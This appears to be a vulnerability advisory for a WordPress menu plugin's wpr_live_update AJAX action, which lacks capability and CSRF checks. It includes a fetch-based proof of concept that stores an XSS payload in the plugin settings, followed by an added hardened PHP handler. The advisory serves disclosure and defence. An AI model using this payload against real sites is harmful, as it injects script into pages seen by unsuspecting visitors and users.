The plugin does not have capability and CSRF checks in the wpr_live_update AJAX action, and does not sanitise and escape some of the submitted data. As a result, any authenticated user, such as a subscriber, could update the plugin's settings and perform Cross-Site Scripting attacks against all visitors and users on the frontend.
fetch("https://example.com/wp-admin/admin-ajax.php", {
    "headers": {
        "content-type": "application/x-www-form-urlencoded",
    },
    "body": "action=wpr_live_update&wprmenu_options[enabled]=1&wprmenu_options[position]=\"><img src onerror=alert(/XSS/)>",
    "method": "POST",
})
.then(response => response.text())
.then(function(data) {
    console.log(data);
    fetch("https://example.com/wp-admin/admin-ajax.php", {
        "headers": {
            "content-type": "application/x-www-form-urlencoded",
        },
        "body": "action=wpr_get_transient_from_data",
        "method": "POST",
    });
});

The XSS will be triggered in all frontend pages.
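A hardened version of such a settings handler, as an added example that is not the plugin's own code: the action name wpr_live_update and the wprmenu_options keys come from the advisory above, while the nonce action, the required capability and the allowed values for position are assumptions chosen for illustration.

```php
<?php
// Added example (not the plugin's code): a hardened handler for the
// wpr_live_update AJAX action. The nonce action name, the capability and
// the allowed "position" values are assumptions for illustration.

add_action( 'wp_ajax_wpr_live_update', 'example_wpr_live_update' );
// Deliberately no wp_ajax_nopriv_ hook: unauthenticated requests get no handler.

function example_wpr_live_update() {
    // CSRF check: the request must carry a nonce issued to the current user.
    check_ajax_referer( 'example_wpr_live_update', 'nonce' );

    // Capability check: a subscriber fails here and cannot touch the settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient permissions', 403 );
    }

    $raw = ( isset( $_POST['wprmenu_options'] ) && is_array( $_POST['wprmenu_options'] ) )
        ? wp_unslash( $_POST['wprmenu_options'] )
        : array();

    // Sanitise on input: coerce to the types and values the setting may hold,
    // so a payload like "><img src onerror=...> is never stored.
    $allowed_positions = array( 'left', 'right' ); // assumed whitelist
    $position = isset( $raw['position'] ) ? sanitize_text_field( $raw['position'] ) : '';
    $clean = array(
        'enabled'  => empty( $raw['enabled'] ) ? 0 : 1,
        'position' => in_array( $position, $allowed_positions, true ) ? $position : 'left',
    );

    update_option( 'wprmenu_options', $clean );
    wp_send_json_success( $clean );
}

// Escape on output as well, so that even a stored value never reaches the
// frontend as live markup (defence in depth).
function example_wpr_menu_class_attr( array $options ) {
    return 'wpr-menu-' . esc_attr( $options['position'] );
}
```

The two fixes are independent: the capability check alone stops a subscriber from saving settings, and the whitelist plus output escaping alone stops the stored value from rendering as script even if the check were bypassed.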
Krzysztof Zając
Krzysztof Zając
Yes
2022-01-26 (about 1 year ago)
2022-01-26 (about 1 year ago)
2022-04-09 (about 9 months ago)